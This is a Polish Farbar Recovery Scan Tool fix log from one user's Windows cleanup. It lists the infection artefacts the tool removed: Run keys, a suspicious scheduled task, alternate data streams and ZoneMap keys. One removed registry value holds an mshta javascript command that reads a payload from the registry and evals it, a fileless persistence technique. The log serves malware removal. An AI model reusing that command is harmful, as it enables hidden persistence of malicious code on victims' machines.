Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 22-01-2017 Uruchomiony przez Pyko (24-01-2017 15:32:46) Run:1 Uruchomiony z C:\Users\Pyko\Downloads Załadowane profile: Pyko (Dostępne profile: Pyko) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKLM-x32\...\Run: [] => [X] HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\Run: [*qguc<*>] => "C:\Users\Pyko\AppData\Local\ebbf8ed\05dc13c.bat" <===== UWAGA (Nazwa wartości zawiera nieprawidłowe znaki) C:\Users\Pyko\AppData\Local\ebbf8ed HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\Policies\Explorer: [] HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\...\Policies\Explorer: [HideSCAVolume] 0 HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE -> ShellIconOverlayIdentifiers: [0PerformanceMonitor] -> {3B5B973C-92A4-4855-9D3F-0F3D23332208} => C:\ProgramData\Microsoft\Performance\Monitor\PerformanceMonitor.dll [2017-01-20] () GroupPolicy: Ograniczenia - Chrome <======= UWAGA SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = S3 WsDrvInst; "C:\Program Files (x86)\Wondershare\Dr.Fone for Android\DriverInstall.exe" [X] S3 cpuz130; Brak ImagePath S3 cpuz138; \??\C:\Users\Pyko\AppData\Local\Temp\cpuz138\cpuz138_x64.sys [X] S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X] S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] 2015-07-28 13:01 - 2015-07-28 13:01 - 0613255 _____ (CMI Limited) C:\Users\Pyko\AppData\Local\nsj1837.tmp 2015-07-28 12:42 - 2015-07-28 12:42 - 0613255 _____ (CMI Limited) C:\Users\Pyko\AppData\Local\nsm9B15.tmp\ Task: C:\Windows\Tasks\HBbRNMacN17uyL5.job => C:\Users\Pyko\AppData\Roaming\HBbRNMacN17uyL5.exe <==== UWAGA C:\Users\Pyko\AppData\Roaming\HBbRNMacN17uyL5.exe AlternateDataStreams: C:\ProgramData\TEMP:890CC2F3 [127] AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [148] HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\Software\Classes\590818e: "C:\Windows\system32\mshta.exe" "javascript:kZo9vd3="H8Bjlqyl";Av4=new ActiveXObject("WScript.Shell");X9mtDuT="ZJMp";CfUA68=Av4.RegRead("HKCU\\software\\bszlfymfbs\\wtsnpduowt");UdftsN5="AUv";eval(CfUA68);qec99S="n1vQ9W";" <===== UWAGA DeleteKey: HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains Hosts: EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\ => Wartość pomyślnie usunięto HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\Software\Microsoft\Windows\CurrentVersion\Run\\*qguc<*> => Wartość pomyślnie usunięto C:\Users\Pyko\AppData\Local\ebbf8ed => pomyślnie przeniesiono HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\ => Wartość pomyślnie usunięto HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\HideSCAVolume => Wartość pomyślnie usunięto HKU\S-1-5-18\Control Panel\Desktop\\SCRNSAVE.EXE => Wartość pomyślnie usunięto HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\0PerformanceMonitor => klucz pomyślnie usunięto HKCR\CLSID\{3B5B973C-92A4-4855-9D3F-0F3D23332208} => klucz nie znaleziono. C:\Windows\system32\GroupPolicy\Machine => pomyślnie przeniesiono C:\Windows\system32\GroupPolicy\GPT.ini => pomyślnie przeniesiono HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto HKLM\System\CurrentControlSet\Services\WsDrvInst => klucz pomyślnie usunięto WsDrvInst => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\cpuz130 => klucz pomyślnie usunięto cpuz130 => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\cpuz138 => klucz pomyślnie usunięto cpuz138 => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\GPUZ => klucz pomyślnie usunięto GPUZ => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\Synth3dVsc => klucz pomyślnie usunięto Synth3dVsc => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\tsusbhub => klucz pomyślnie usunięto tsusbhub => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\VGPU => klucz pomyślnie usunięto VGPU => serwis pomyślnie usunięto C:\Users\Pyko\AppData\Local\nsj1837.tmp => pomyślnie przeniesiono C:\Users\Pyko\AppData\Local\nsm9B15.tmp => pomyślnie przeniesiono C:\Windows\Tasks\HBbRNMacN17uyL5.job => pomyślnie przeniesiono "C:\Users\Pyko\AppData\Roaming\HBbRNMacN17uyL5.exe" => nie znaleziono. C:\ProgramData\TEMP => ":890CC2F3" ADS pomyślnie usunięto. C:\ProgramData\TEMP => ":CB0AACC9" ADS pomyślnie usunięto. HKU\S-1-5-21-2811792325-3593454412-1631040856-1000\Software\Classes\590818e => klucz pomyślnie usunięto HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains => klucz pomyślnie usunięto HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains => klucz pomyślnie usunięto C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono Hosts pomyślnie przywrócono. =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 5220974 B Java, Flash, Steam htmlcache => 5029 B Windows/system/drivers => 120902924 B Edge => 0 B Chrome => 382729345 B Firefox => 378063081 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 66228 B Public => 0 B ProgramData => 0 B systemprofile => 58575837 B systemprofile32 => 6647992 B LocalService => 132244 B NetworkService => 129092 B Pyko => 84840728 B RecycleBin => 0 B EmptyTemp: => 997.3 MB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 15:36:42 ====